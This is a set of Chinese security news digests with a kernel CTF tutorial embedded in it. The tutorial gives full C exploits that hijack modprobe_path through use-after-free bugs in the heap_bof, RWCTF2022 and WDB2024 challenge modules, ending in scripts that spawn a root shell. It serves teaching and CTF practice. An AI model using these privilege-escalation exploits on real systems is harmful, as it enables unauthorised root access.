1、研究人员揭示企业VPN客户端的远程代码执行风险 https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/ 在SANS HackFest Hollywood 2024会议上，安全专家展示了企业VPN客户端的漏洞，揭示了通过VPN服务器获取远程代码执行权限的潜在风险。研究表明，许多广泛使用的VPN客户端存在信任关系漏洞，攻击者可以通过恶意VPN服务器轻松获取高权限访问。为帮助安全专业人士理解并防范这一威胁，研究团队发布了NachoVPN工具，一个开源平台，能够模拟恶意VPN服务器并利用这些漏洞进行攻击 2、英国Wirral大学医院遭遇重大网络安全事件 https://www.govinfosecurity.com/uk-nhs-hospital-reports-major-cyberincident-a-26915 英国西北部Wirral大学教学医院日前报告发生了严重的网络安全事件，导致当天所有门诊预约被迫取消。医院方面表示，此次事件属于“重大网络安全事故”，并要求患者仅在紧急情况下前往急诊部门。受影响的医院还包括Arrowe Park、Clatterbridge以及Wirral妇女儿童医院。根据医院更新的信息，产科、新生儿科和急诊分诊仍正常运作，但Arrowe Park的系统已因攻击而瘫痪。医院工作人员称，由于电子系统无法使用，所有记录 3、非洲联合打击网络犯罪行动抓获1000余名嫌疑人 https://cyberscoop.com/african-cybercrime-crackdown-nets-more-than-1000-suspects/ 国际执法合作行动“塞伦盖蒂行动”在过去两个月内成功打击了横跨19个非洲国家的网络犯罪活动，共抓获1000多名嫌疑人。此次行动由国际刑警组织（Interpol）和非洲刑警组织（Afripol）联合发起，涉及的犯罪活动包括勒索软件攻击、商务邮件欺诈等。根据通报，犯罪分子已造成35000个受害者，损失金额高达1.93亿美元。“塞伦盖蒂行动”是继2022年和2023年“非洲网络暴风”行动之后，又一次广泛的国际网络犯罪打击行动。Afripo 4、Firefox和Tor浏览器遭遇神秘0Day漏洞攻击 https://www.freebuf.com/news/416301.html 近日，俄罗斯某APT组织被发现利用两个以前未知的漏洞攻击Windows PC上的Firefox和Tor浏览器用户。安全厂商ESET指出，这些零日漏洞攻击可能造成“广泛传播”，主要针对欧洲和北美的用户。 5、CISA敦促机构在主动攻击中修补关键的“阵列网络”漏洞 https://thehackernews.com/2024/11/cisa-urges-agencies-to-patch-critical.html 美国网络安全和基础设施安全局( CISA )在其已知利用漏洞目录下添加了一个影响 Array Networks AG 和 vxAG 安全访问网关的关键安全漏洞补丁。 6、PyPI储存库aiocpa被发现通过机器人泄露加密密钥 https://thehackernews.com/2024/11/pypi-python-library-aiocpa-found.html 存储库的管理员已经隔离了包ai ocpa ，新的更新包含通过 Telegram 输出私钥的恶意代码。 7、GitLab LFS Token权限提升漏洞 https://www.secrss.com/articles/72791 近日，奇安信CERT监测到官方修复GitLab LFS Token 权限提升漏洞(CVE-2024-8114)，由于GitLab对LFS令牌的处理存在缺陷，使得攻击者可以利用用户的个人访问令牌（PAT）来获取LFS令牌，进而以该用户的身份执行未经授权的操作，比如读取或修改存储在LFS中的敏感文件。鉴于该漏洞影响范围较大，建议客户尽快做好自查及防护。 8、NVIDIA修补UFM产品中的高严重性漏洞 https://www.anquanke.com/post/id/302229 英伟达™（NVIDIA®）近日发布固件更新，以解决影响其 UFM Enterprise、UFM Appliance 和 UFM CyberAI 产品的高严重性漏洞。该漏洞被识别为 CVE-2024-0130，可允许攻击者获得升级权限、篡改数据、拒绝服务并披露敏感信息。 9、谷歌新推出的工具简化了安卓迁移后的应用登录过程 https://www.anquanke.com/post/id/302226 谷歌推出了一项名为 “恢复凭据 ”的新功能，帮助用户在迁移到新的安卓设备后安全地恢复第三方应用程序的账户访问权限。 10、CISA 对苹果和甲骨文零日漏洞敲响警钟 https://www.anquanke.com/post/id/302150 网络安全和基础设施安全局（CISA）就影响苹果和甲骨文产品的三个被主动利用的漏洞发出紧急警告。这些漏洞已被添加到 CISA 的已知漏洞（KEV）目录中，强调了用户立即更新其软件的迫切需要。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、攻击者使用Excel XLL文件传播XenoRAT远程访问木马 https://hunt.io/blog/xenorat-excel-xll-confuserex-as-access-method 研究人员在分析恶意软件样本时发现，一种新型的XenoRAT远程访问木马采用了Excel XLL文件作为传播载体，并通过ConfuserEx进行保护。这一变化标志着XenoRAT攻击手段的转变，采用了较为不常见的文件类型来部署恶意代码，可能对企业网络构成更大威胁。该XenoRAT样本名为“Payment_Details.xll”，通过Excel-DNA框架加载恶意.NET程序集，并利用ConfuserEx进行加密和混淆，以逃避检测。执行该XLL文件后，恶意批处理 2、供应链管理供应商Blue Yonder遭受勒索软件攻击 https://www.theregister.com/2024/11/26/blue_yonder_ransomware/ 供应链管理公司Blue Yonder近日遭遇勒索软件攻击，导致其托管服务环境大规模中断，直接影响英国多家杂货连锁店的供应链运作。Blue Yonder作为Panasonic子公司，为全球众多企业提供基于AI的供应链解决方案，其客户包括Tesco、Sainsbury、Morrisons等知名零售商。据公司公告，这起攻击发生在11月21日，目前团队正与外部网络安全公司合作加紧恢复受影响的服务。Blue Yonder表示其公共云环境未发现可疑活动，但此次中断已迫使客户采取应 3、QNAP修复NAS与路由器中的多项关键漏洞 https://www.bleepingcomputer.com/news/security/qnap-addresses-critical-flaws-across-nas-router-software/ QNAP近日发布多份安全公告，修复多款产品中的关键安全漏洞，提醒用户尽快更新以避免安全风险。其中，NAS应用Notes Station 3存在两个严重漏洞，包括缺乏关键功能认证（CVE-2024-38643，CVSS评分9.3）和服务器端请求伪造（CVE-2024-38645）。这些漏洞可能导致远程攻击者无需凭据即可获取系统权限或访问敏感数据。目前，这些问题已在3.9.7版本中修复。此 4、微软全球宕机11小时，多项核心服务无法使用 https://www.freebuf.com/news/416161.html 昨天（11月25日），微软的多项核心服务（包括 365、Exchange Online、Teams 和 Outlook）再次遭遇全球性的大规模中断，用户随后在社交媒体上报告了一系列问题，如无法发送邮件、网站崩溃及出现错误页面。在事故发生的6小时内，Downdetector已经收到了数千份报告，受影响的用户表示他们还遇到了连接其他服务的问题，包括OneDrive、Purview、Copilot以及Outlook Web和Desktop。 5、Meta报告揭示“杀猪盘”诈骗的惊人规模，30万人被迫参与 https://starmap.dbappsecurity.com.cn/info/8899 Meta最近发布的一份报告揭示了“猪宰割”诈骗背后的有组织犯罪网络及其对全球用户的影响。这种诈骗手法通过强迫劳动在诈骗中心进行，利用人们的信任来窃取投资，尤其是加密货币投资。报告指出，全球约有30万人被迫参与诈骗，犯罪团伙每年盗取640亿美元。 6、俄黑客通过“近邻攻击”远程入侵美国企业WiFi网络 https://www.secrss.com/articles/72703 俄罗斯黑客组织APT28成功突破物理攻击范围，入侵了万里之外的一家美国企业的Wi-Fi网络。 7、WordPress 插件严重漏洞影响 200,000 个站点 https://securityonline.info/cve-2024-10542-cve-2024-10781-critical-wordpress-plugin-flaw-exposes-200000-sites Wordfence 威胁情报团队最近的一份报告揭示了 CleanTalk WordPress 插件 Anti-Spam 中的两个严重漏洞，影响了超过 200,000 个活跃安装。这些漏洞编号为 CVE-2024-10542 和 CVE-2024-10781，可能允许未经身份验证的攻击者通过安装恶意插件和执行任意代码来破坏网站。 8、RomCom在网络攻击中利用Firefox 和Windows零日漏洞 https://thehackernews.com/2024/11/romcom-exploits-zero-day-firefox-and.html 与俄罗斯有关的威胁组织RomCom与两个安全漏洞的零日利用有关，一个在 Mozilla Firefox 中，另一个在 Microsoft Windows 中，作为旨在在受害者系统上传递同名后门的攻击的一部分。 9、PHP 修补了多个漏洞，包括一个严重漏洞 https://www.anquanke.com/post/id/302198 PHP 开发团队发布了紧急安全更新，以解决影响 8.1.31、8.2.26 和 8.3.14 之前版本的多个漏洞。这些漏洞的严重程度不一，其中一些可能允许攻击者泄漏敏感信息、执行任意代码或发起拒绝服务攻击。CVE-2024-8932 是最严重的漏洞之一，它允许在 ldap_escape 函数中进行越界 (OOB) 访问。该漏洞的 CVSS 得分为 9.8，可使攻击者在受影响的系统上执行任意代码。 10、四部门联合印发《电信网络诈骗及其关联违法犯罪联合惩戒办法》 https://www.secrss.com/articles/72726 公安部会同国家发展和改革委员会、工业和信息化部、中国人民银行联合印发《电信网络诈骗及其关联违法犯罪联合惩戒办法》。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 本文我们通过我们的老朋友heap_bof来讲解Linux kernel中任意地址申请的其中一种比赛比较常用的利用手法modprobe_path（虽然在高版本内核已经不可用了但ctf比赛还是比较常用的）。再通过两道近期比赛的赛题来讲解。 Arbitrary Address Allocation 利用思路 通过 uaf 修改 object 的 free list 指针实现任意地址分配。与 glibc 不同的是，内核的 slub 堆管理器缺少检查，因此对要分配的目标地址要求不高，不过有一点需要注意：当我们分配到目标地址时会把目标地址前 8 字节的数据会被写入 freelist，而这通常并非一个有效的地址，从而导致 kernel panic，因此在任意地址分配时最好确保目标 object 的 free list 字段为 NULL 。 当能够任意地址分配的时候，与 glibc 改 hook 类似，在内核中通常修改的是 modprobe_path 。modprobe_path 是内核中的一个变量，其值为 /sbin/modprobe ，因此对于缺少符号的内核文件可以通过搜索 /sbin/modprobe 字符串的方式定位这个变量。 当我们尝试去执行（execve）一个非法的文件（file magic not found），内核会经历如下调用链： entry_SYSCALL_64()    sys_execve()        do_execve()            do_execveat_common()                bprm_execve()                    exec_binprm()                        search_binary_handler()                            __request_module() // wrapped as request_module                                call_modprobe() 其中 call_modprobe() 定义于 kernel/kmod.c，我们主要关注这部分代码： static int call_modprobe(char *module_name, int wait) { //... argv[0] = modprobe_path; argv[1] = "-q"; argv[2] = "--"; argv[3] = module_name; /* check free_modprobe_argv() */ argv[4] = NULL; info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL, NULL, free_modprobe_argv, NULL); if (!info) goto free_module_name; return call_usermodehelper_exec(info, wait | UMH_KILLABLE); //... 在这里调用了函数 call_usermodehelper_exec() 将 modprobe_path 作为可执行文件路径以 root 权限将其执行。 我们不难想到的是：若是我们能够劫持 modprobe_path，将其改写为我们指定的恶意脚本的路径，随后我们再执行一个非法文件，内核将会以 root 权限执行我们的恶意脚本。 或者分析vmlinux即可(对于一些没有call_modprobe()符号的直接交叉引用即可)。 __int64 _request_module(        char a1,        __int64 a2,        double a3,        double a4,        double a5,        double a6,        double a7,        double a8,        double a9,        double a10,       ...) { ......    if ( v19 )   { ......      v21 = call_usermodehelper_setup(             (__int64)&byte_FFFFFFFF82444700, // modprobe_path             (__int64)v18,             (__int64)&off_FFFFFFFF82444620,              3264,              0LL,             (__int64)free_modprobe_argv,              0LL); ...... } .data:FFFFFFFF82444700 byte_FFFFFFFF82444700             ; DATA XREF: __request_module:loc_FFFFFFFF8108C6D8↑r .data:FFFFFFFF82444700                 db 2Fh ; /       ; __request_module+14B↑o ...                       .data:FFFFFFFF82444701                 db  73h ; s .data:FFFFFFFF82444702                 db  62h ; b .data:FFFFFFFF82444703                 db  69h ; i .data:FFFFFFFF82444704                 db  6Eh ; n .data:FFFFFFFF82444705                 db  2Fh ; / .data:FFFFFFFF82444706                 db  6Dh ; m .data:FFFFFFFF82444707                 db  6Fh ; o .data:FFFFFFFF82444708                 db  64h ; d .data:FFFFFFFF82444709                 db  70h ; p .data:FFFFFFFF8244470A                 db  72h ; r .data:FFFFFFFF8244470B                 db  6Fh ; o .data:FFFFFFFF8244470C                 db  62h ; b .data:FFFFFFFF8244470D                 db  65h ; e .data:FFFFFFFF8244470E                 db    0 exp #include "src/pwn_helper.h" #define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_WRITE 8 #define BOF_READ 9 size_t modprobe_path = 0xFFFFFFFF81E48140; size_t seq_ops_start = 0xffffffff81228d90; struct param {    size_t len;    size_t *buf;    long long idx; }; void alloc_buf(int fd, struct param* p) {    printf("[+] kmalloc len:%lu idx:%lld\n", p->len, p->idx);    ioctl(fd, BOF_MALLOC, p); } void free_buf(int fd, struct param* p) {    printf("[+] kfree len:%lu idx:%lld\n", p->len, p->idx);    ioctl(fd, BOF_FREE, p); } void read_buf(int fd, struct param* p) {    printf("[+] copy_to_user len:%lu idx:%lld\n", p->len, p->idx);    ioctl(fd, BOF_READ, p); } void write_buf(int fd, struct param* p) {    printf("[+] copy_from_user len:%lu idx:%lld\n", p->len, p->idx);    ioctl(fd, BOF_WRITE, p); } int main() {    // len buf idx    size_t* buf = malloc(0x500);    struct param p = {0x20, buf, 0};    printf("[+] user_buf : %p\n", p.buf);    int bof_fd = open("/dev/bof", O_RDWR);    if (bof_fd < 0) {        puts(RED "[-] Failed to open bof." NONE);        exit(-1);   }    printf(YELLOW "[*] try to leak kbase\n" NONE);    alloc_buf(bof_fd, &p);    free_buf(bof_fd, &p);    int seq_fd = open("/proc/self/stat", O_RDONLY);    read_buf(bof_fd, &p);    qword_dump("leak seq_ops", buf, 0x20);    size_t kernel_offset = buf[0] - seq_ops_start;    printf(YELLOW "[*] kernel_offset %p\n" NONE, (void*)kernel_offset);    modprobe_path += kernel_offset;    printf(LIGHT_BLUE "[*] modprobe_path addr : %p\n" NONE, (void*)modprobe_path);        p.len = 0xa8;    alloc_buf(bof_fd, &p);    free_buf(bof_fd, &p);    read_buf(bof_fd, &p);    buf[0] = modprobe_path - 0x20;    write_buf(bof_fd, &p);    alloc_buf(bof_fd, &p);    alloc_buf(bof_fd, &p);    read_buf(bof_fd, &p);    qword_dump("leak modprobe_path", buf, 0x30);    strcpy((char *) &buf[4], "/tmp/shell.sh\x00");    write_buf(bof_fd, &p);    read_buf(bof_fd, &p);    qword_dump("leak modprobe_path", buf, 0x30);    if (open("/shell.sh", O_RDWR) < 0) {        system("echo '#!/bin/sh' >> /tmp/shell.sh");        system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /tmp/shell.sh");        system("chmod +x /tmp/shell.sh");   }    system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");    system("chmod +x /tmp/fake");    system("/tmp/fake");    return 0; } RWCTF2022 Digging into kernel 1 & 2 题目分析 start.sh #!/bin/sh qemu-system-x86_64 \    -kernel bzImage \    -initrd rootfs.img \    -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet noapic kalsr" \    -cpu kvm64,+smep,+smap \    -monitor null \    --nographic \    -s 逆向分析 int __cdecl xkmod_init() {  kmem_cache *v0; // rax  printk(&unk_1E4);  misc_register(&xkmod_device);  v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);  buf = 0LL;  s = v0;  return 0; }int __fastcall xkmod_release(inode *inode, file *file) {  return kmem_cache_free(s, buf); // maybe double free }void __fastcall xkmod_ioctl(__int64 a1, int a2, __int64 a3) {  __int64 data; // [rsp+0h] [rbp-20h] BYREF  unsigned int idx; // [rsp+8h] [rbp-18h]  unsigned int size; // [rsp+Ch] [rbp-14h]  unsigned __int64 v6; // [rsp+10h] [rbp-10h]                                                // v3 __ : 0x8 rsp + 0x0                                                // v4 __ : 0x4 rsp + 0x8                                                // v5 __ : 0x4 rsp + 0xc  v6 = __readgsqword(0x28u);  if ( a3 ) {    copy_from_user(&data, a3, 0x10LL);    if ( a2 == 0x6666666 )   {      if ( buf && size <= 0x50 && idx <= 0x70 )     {        copy_from_user((char *)buf + (int)idx, data, (int)size);        return;     }   }    else   {      if ( a2 != 0x7777777 )     {        if ( a2 == 0x1111111 )          buf = (void *)kmem_cache_alloc(s, 0xCC0LL);        return;     }      if ( buf && size <= 0x50 && idx <= 0x70 )     {       ((void (__fastcall *)(__int64, char *, int))copy_to_user)(data, (char *)buf + (int)idx, size);        return;     }   }    xkmod_ioctl_cold(); } } 利用思路 关于内核基址获取，在内核堆基址（page_offset_base） + 0x9d000 处存放着 secondary_startup_64 函数的地址，而我们可以从 free object 的 next 指针获得一个堆上地址，从而去找堆的基址，之后分配到一个堆基址 + 0x9d000 处的 object 以泄露内核基址，这个地址前面刚好有一片为 NULL 的区域方便我们分配。 #define __PAGE_OFFSET           page_offset_base #define PAGE_OFFSET ((unsigned long)__PAGE_OFFSET) #define __va(x) ((void *)((unsigned long)(x)+PAGE_OFFSET)) /* Must be perfomed *after* relocation. */ trampoline_header = (struct trampoline_header *) __va(real_mode_header->trampoline_header); ... trampoline_header->start = (u64) secondary_startup_64; [......] // vmlinux 查找 secondary_startup_64 基址 .text:FFFFFFFF81000030 ; void secondary_startup_64() [......] pwndbg>x/40gx (0xffff9f5d40000000+0x9d000-0x20 0xffff9f5d4009cfe0: 0X0000000000000000 0X0000000000000000 0xffff9f5d4009cff0: 0X0000000000000000 0X0000000005c0c067 0xffff9f5d4009d000: 0xffffffff97c00030 0X0000000000000901 0xffff9f5d4009d010: 0X00000000000006b0 0X0000000000000000 0xffff9f5d4009d020: 0X0000000000000000 0X0000000000000000 至于 page_offset_base 可以通过 object 上的 free list 泄露的堆地址与上 0xFFFFFFFFF0000000 获取。不同版本可查看vmmap。 exp #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> #include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/io.h> size_t modprobe_path = 0xFFFFFFFF82444700; void qword_dump(char *desc, void *addr, int len) {    uint64_t *buf64 = (uint64_t *) addr;    uint8_t *buf8 = (uint8_t *) addr;    if (desc != NULL) {        printf("[*] %s:\n", desc);   }    for (int i = 0; i < len / 8; i += 4) {        printf(" %04x", i * 8);        for (int j = 0; j < 4; j++) {            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");       }        printf("   ");        for (int j = 0; j < 32 && j + i * 8 < len; j++) {            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');       }        puts("");   } } struct Data {    size_t *buf;    u_int32_t offset;    u_int32_t size; }; void alloc_buf(int fd, struct Data *data) {    ioctl(fd, 0x1111111, data); } void write_buf(int fd, struct Data *data) {    ioctl(fd, 0x6666666, data); } void read_buf(int fd, struct Data *data) {    ioctl(fd, 0x7777777, data); } int main() {    int xkmod_fd[5];    for (int i = 0; i < 5; i++) {        xkmod_fd[i] = open("/dev/xkmod", O_RDONLY);        if (xkmod_fd[i] < 0) {            printf("[-] %d Failed to open xkmod.", i);            exit(-1);       }   }    struct Data data = {malloc(0x1000), 0, 0x50};    alloc_buf(xkmod_fd[0], &data);    close(xkmod_fd[0]);    read_buf(xkmod_fd[1], &data);    qword_dump("buf", data.buf, 0x50);    size_t page_offset_base = data.buf[0] & 0xFFFFFFFFF0000000;    printf("[+] page_offset_base: %p\n", page_offset_base);    data.buf[0] = page_offset_base + 0x9d000 - 0x10;    write_buf(xkmod_fd[1], &data);    alloc_buf(xkmod_fd[1], &data);    alloc_buf(xkmod_fd[1], &data);    data.size = 0x50;    read_buf(xkmod_fd[1], &data);    qword_dump("buf", data.buf, 0x50);        size_t kernel_offset = data.buf[2] - 0xffffffff81000030;    printf("kernel offset: %p\n", kernel_offset);    modprobe_path += kernel_offset;    close(xkmod_fd[1]);    data.buf[0] = modprobe_path - 0x10;    write_buf(xkmod_fd[2], &data);    alloc_buf(xkmod_fd[2], &data);    alloc_buf(xkmod_fd[2], &data);    strcpy((char *) &data.buf[2], "/home/shell.sh");    write_buf(xkmod_fd[2], &data);    if (open("/home/shell.sh", O_RDWR) < 0) {        system("echo '#!/bin/sh' >> /home/shell.sh");        system("echo 'setsid cttyhack setuidgid 0 sh' >> /home/shell.sh");        system("chmod +x /home/shell.sh");   }    system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");    system("chmod +x /home/fake");    system("/home/fake");    return 0; } WDB2024 PWN03 利用思路 基本上和RWCTF2022 Digging into kernel 1 & 2是一样的，这道题大家拿去练手即可，建议大家自行分析题目，我只把我的exp贴在下面，但是建议大家自己写一个exp。 exp #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> #include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/io.h> size_t modprobe_path = 0xFFFFFFFF81E58B80; void qword_dump(char *desc, void *addr, int len) {    uint64_t *buf64 = (uint64_t *) addr;    uint8_t *buf8 = (uint8_t *) addr;    if (desc != NULL) {        printf("[*] %s:\n", desc);   }    for (int i = 0; i < len / 8; i += 4) {        printf(" %04x", i * 8);        for (int j = 0; j < 4; j++) {            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");       }        printf("   ");        for (int j = 0; j < 32 && j + i * 8 < len; j++) {            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');       }        puts("");   } } void alloc_buf(int fd, int size) {    printf("[+] kmalloc %d\n", size);    ioctl(fd, 0x0, size); } void free_buf(int fd) {    printf("[+] kfree\n");    ioctl(fd, 0x1, 0); } void read_buf(int fd, size_t* buf, int size) {    printf("[+] copy_to_user %d\n", size);    read(fd, buf, size);    qword_dump("read_buf", buf, size); } void write_buf(int fd, size_t* buf, int size) {    printf("[+] copy_from_user %d\n", size);    qword_dump("write_buf", buf, size);    write(fd, buf, size); } int main() {    size_t* buf = malloc(0x500);    int easy_fd;    easy_fd = open("/dev/easy", O_RDWR);    alloc_buf(easy_fd, 0xa8);    free_buf(easy_fd);    read_buf(easy_fd, buf, 0xa8);    size_t page_offset_base = buf[0] & 0xFFFFFFFFF0000000;    printf("[*] page_offset_base %p\n", page_offset_base);    buf[0] = page_offset_base + 0x9d000 - 0x10;    write_buf(easy_fd, buf, 0x8);        alloc_buf(easy_fd, 0xa8);    alloc_buf(easy_fd, 0xa8);    read_buf(easy_fd, buf, 0xa8);        size_t kernel_offset = buf[2] - 0xFFFFFFFF81000110;    printf("[*] kernel offset: %p\n", kernel_offset);    modprobe_path += kernel_offset;    buf[0] = modprobe_path - 0x20;    alloc_buf(easy_fd, 0xa8);    free_buf(easy_fd);    write_buf(easy_fd, buf, 0x8);    alloc_buf(easy_fd, 0xa8);    alloc_buf(easy_fd, 0xa8);    read_buf(easy_fd, buf, 0x20);    strcpy((char *) &buf[4], "/shell.sh\x00");    write_buf(easy_fd, buf, 0x30);    if (open("/shell.sh", O_RDWR) < 0) {        system("echo '#!/bin/sh' >> /shell.sh");        system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /shell.sh");        system("chmod +x /shell.sh");   }    system("echo -e '\\xff\\xff\\xff\\xff' > /fake");    system("chmod +x /fake");    system("/fake");    return 0; }

1、IGT遭受网络攻击导致部分系统和应用程序中断 https://securityaffairs.com/171311/hacking/cyberattack-on-gambling-giant-igt.html 2024年11月17日，国际博彩技术公司（IGT）遭受网络攻击，部分内部信息技术系统和应用因此受影响。IGT迅速启动了其网络安全事件响应计划，并与外部专家合作展开调查以评估和修复此次未经授权的访问。为遏制威胁，公司主动将部分系统下线，同时实施业务连续性计划以减少运营中断。IGT尚未公开此次攻击的详细信息，但其应对措施表明，该事件可能是一起勒索软件攻击。IGT在向美国证券交易委员会（SEC）提交的FORM 6-K文件中透露，公司正在 2、Meta封禁超过200万个与“杀猪盘”骗局相关的账户 https://about.fb.com/news/2024/11/cracking-down-organized-crime-scam-centers/ Meta近日披露，公司在其平台Facebook和Instagram上封禁了超过200万个与“杀猪盘”骗局相关的账户。“杀猪盘”是一种结合感情诈骗和投资欺诈的骗局，受害者先被培养信任，然后被诱骗投资虚假的加密货币平台，最终遭到资金掠夺。Meta指出，这类骗局不仅涉及欺骗受害者，还包括强迫劳工的恶性行为。不少诈骗中心位于东南亚国家，如缅甸、老挝、柬埔寨等地，一些诈骗从业者甚至是因高薪诱惑被骗来的受害者，他们被强迫从事网络犯罪，甚至遭受暴力威胁 3、微软向Windows Insiders推出AI驱动的Recall功能 https://www.bleepingcomputer.com/news/microsoft/microsoft-rolls-out-recall-to-windows-insiders-with-copilot-plus-pcs/ 微软宣布，其备受争议的AI驱动功能Recall现已向Windows Insiders Dev频道用户推出，首先适配Snapdragon驱动的Copilot+ PC。这一功能允许用户通过自然语言搜索恢复数秒内自动截取的屏幕快照，从而简化信息检索。然而，由于隐私和安全问题，Recall自发布以来一直饱受争议。Recall通过设备的神经处理单元（NPU）和本地AI模 4、研究人员发现使用 BYOVD 绕过防病毒保护的恶意软件 https://thehackernews.com/2024/11/researchers-uncover-malware-using-byovd.html 网络安全研究人员发现了一种新的恶意活动，该活动利用一种名为“自带易受攻击的驱动程序”( BYOVD ) 的技术来解除安全保护并最终获得对受感染系统的访问权限。 5、新型LODEINFO恶意软件袭击政府和高科技行业 https://starmap.dbappsecurity.com.cn/info/8851 根据Trend Micro的详细报告，新的LODEINFO恶意软件活动已针对日本、台湾和印度的政府机构及高科技行业展开，显示出该组织战术的显著更新。 6、NSOCKS僵尸网络覆盖180个国家的犯罪代理网络 https://starmap.dbappsecurity.com.cn/info/8859 该网络以臭名昭著的ngioweb僵尸网络为基础，日均拥有超过35,000个机器人，遍布180个国家，成为恶意活动的支柱，包括DDoS攻击、网络钓鱼和恶意软件混淆。 7、QNAP 严重漏洞可让攻击者执行远程代码 https://cybersecuritynews.com/critical-qnap-vulnerability-let-attackers-execute-remote-code/ QNAP 的 QuRouter 中已发现多个漏洞，特别影响 2.4.x 版本。这些漏洞被追踪为 CVE-2024-48860 和 CVE-2024-48861，这会造成严重风险，因为它们允许远程攻击者通过命令注入执行任意命令。 8、7-Zip 漏洞允许远程执行代码 https://securityonline.info/cve-2024-11477-7-zip-vulnerability-allows-remote-code-execution-update-now/ 流行的文件归档程序 7-Zip 中发现了一个高严重性漏洞 (CVE-2024-11477)，该漏洞可能允许攻击者在易受攻击的系统上执行恶意代码。该漏洞由趋势科技安全研究中心的 Nicholas Zubrisky 发现，存在于该程序的 Zstandard 解压函数中。由于对用户提供的数据验证不充分，可能会发生整数下溢，从而使攻击者能够在受影响的进程中执行任意代码。该漏洞的CVSS评分为7. 9、Oracle 修补了被利用的 Agile PLM 零日漏洞 https://www.securityweek.com/oracle-patches-exploited-agile-plm-zero-day/ Oracle 本周发布了针对敏捷产品生命周期管理 (PLM) 中已被广泛利用的高严重性信息泄露漏洞的补丁。该零日漏洞被追踪为 CVE-2024-21287（CVSS 评分为 7.5），影响 Agile PLM 版本 9.3.6，无需身份验证即可远程利用。 10、微软、Meta和司法部联合摧毁全球钓鱼攻击网络-ONNX https://www.anquanke.com/post/id/302153 Meta Platforms、微软（Microsoft）和美国司法部（DoJ）宣布采取独立行动，打击网络犯罪，破坏那些助长诈骗、欺诈和网络钓鱼攻击的服务。为此，微软的数字犯罪部门（DCU）表示，该部门查获了 240 个欺诈网站，这些网站与一个名为 Abanoub Nady（又名 MRxC0DER 和 mrxc0derii）的埃及网络犯罪协助者有关，该协助者宣传出售一种名为 ONNX 的网络钓鱼工具包。据说，纳迪的犯罪行动最早可追溯到 2017 年。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、新的Ghost Tap攻击利用NFC移动支付窃取资金 https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay 威胁情报机构ThreatFabric近期发现，犯罪分子正利用NFC流量汇聚技术实施新型信用卡套现方案。该方案被称为“幽灵轻击”（Ghost Tap），核心是通过工具NFCGate实现远程支付操作，将被盗信用卡与移动支付账户（如Google Pay或Apple Pay）绑定后，使用中继服务器将NFC支付请求从攻击者设备转移至骡子设备。骡子通过POS终端完成交易，而攻击者则远程操控，从而实现匿名资金套现。这种方法不仅可以绕过传统交易监控系 2、亚马逊及其子公司Audible涌入大量虚假信息 https://www.bleepingcomputer.com/news/security/amazon-and-audible-flooded-with-forex-trading-and-warez-listings/ 亚马逊及其子公司Audible近期遭遇大量垃圾内容涌入，这些虚假信息链扩散可疑的外汇交易计划、Telegram频道，以及声称提供盗版软件的链接。垃圾信息出现在Amazon.com、Amazon Music、Audible等平台上，以伪装的播客或列表形式诱导用户访问外部可疑网站。BleepingComputer报告显示，这些内容包含零秒长度的“播客集”或作弊性描述，用于搜 3、MITRE发布2024年最危险的25个软件漏洞 https://cwe.mitre.org/top25/ MITRE近日公布2024年“最危险软件漏洞Top 